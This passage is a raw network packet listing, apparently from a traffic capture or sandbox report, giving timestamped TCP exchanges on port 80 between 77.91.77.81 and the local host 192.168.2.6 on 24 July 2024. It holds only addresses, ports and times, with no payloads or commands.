                                                                                        Jul 24, 2024 07:14:24.797147989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797182083 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797214031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797233105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797264099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797296047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797317028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797347069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797364950 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797403097 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797419071 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797451019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797468901 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797499895 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797518969 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797540903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797569036 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797600985 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797619104 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797650099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797682047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797703028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797727108 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.797751904 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797785044 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.797836065 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.800184011 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800219059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800252914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800285101 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.800311089 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.800333023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800364971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800396919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800416946 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.800446987 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800478935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.800515890 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.800548077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.800565958 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802405119 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802438974 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802468061 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802486897 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802512884 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802545071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802577972 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802598953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802623034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802649021 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802681923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802711964 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802731037 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802753925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802788019 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.802807093 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.802829027 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.830657005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.830712080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.830744982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.830776930 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.830797911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.830820084 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.830849886 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.830882072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.830904007 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.830995083 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.832603931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832638025 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832669973 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832703114 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.832721949 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.832745075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832793951 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832827091 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832849026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.832873106 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.832897902 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832927942 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832959890 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.832982063 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.833012104 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833043098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833065987 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.833084106 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.833112955 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833146095 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833178043 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833197117 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.833228111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833259106 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833283901 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.833302021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.833331108 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833364010 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.833417892 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.834093094 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834129095 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834161043 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834186077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.834206104 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.834234953 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834269047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834320068 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.834564924 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834595919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834629059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834649086 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.834669113 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.834697962 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834729910 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834762096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.834784031 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.835010052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.835452080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835484982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835517883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835552931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.835583925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835618973 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835639954 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.835664034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.835690975 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835722923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.835788965 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.836293936 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.836373091 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.836405039 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.836429119 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.836447954 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.836476088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.836569071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.836601973 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.836626053 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.836643934 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.836673021 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837305069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837340117 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837366104 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.837387085 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.837426901 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837459087 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837491035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837564945 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.837596893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.837654114 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.838396072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.838429928 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.838452101 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.838471889 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.838499069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.838531971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.838565111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.838583946 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.839006901 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885229111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885312080 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885350943 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885385990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885409117 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885433912 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885524988 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885556936 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885576010 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885602951 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885627985 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885669947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.885684013 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.885713100 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.886356115 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.886390924 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.886413097 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.886432886 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.886462927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.886503935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.886518002 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.886548042 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.886569023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.886601925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.886620045 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.886646032 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887424946 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887460947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887490034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887509108 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887536049 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887569904 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887589931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887617111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887639046 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887671947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887692928 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887732029 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.887746096 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.887778044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888163090 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888195992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888216972 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888247013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888278961 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888298988 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888322115 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888349056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888381958 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888432980 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888827085 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888860941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888892889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.888922930 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888943911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.888967037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889000893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889034033 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889053106 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.889750004 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889784098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889816999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.889837027 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.889857054 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889889956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.889981031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890003920 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.890034914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890068054 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890086889 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.890111923 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.890697956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890734911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890765905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890810966 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890826941 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.890826941 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.890872002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890906096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.890924931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.890954971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.891047955 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.891515017 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.891570091 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.891583920 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.891668081 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.921672106 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.921735048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.921772957 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.921807051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.921885967 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.921958923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.921993971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922027111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922033072 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.922060013 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.922065020 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922082901 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.922112942 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.922712088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922748089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922780991 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922811985 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922843933 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922846079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.922893047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.922899008 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.922944069 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.923476934 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.923510075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.923537970 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.923543930 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.923562050 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.923578024 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.923598051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.923628092 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.923685074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.924089909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.924140930 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.924174070 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.924204111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.924206972 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.924236059 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.924240112 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.924267054 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.924273014 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.924288988 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.924520016 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925235033 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925267935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925297022 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925299883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925324917 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925333023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925365925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925381899 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925400972 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925416946 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925434113 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925448895 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925653934 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.925935984 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.925987005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926018953 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926042080 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926050901 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926080942 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926083088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926109076 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926119089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926129103 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926151037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926173925 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926804066 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926898956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926933050 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926949978 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.926964998 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.926999092 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.927000999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.927022934 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.927032948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.927048922 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.927066088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.927087069 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.927400112 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.927861929 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.927895069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.927927971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.927927971 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.927949905 CEST4971880192.168.2.677.91.77.81
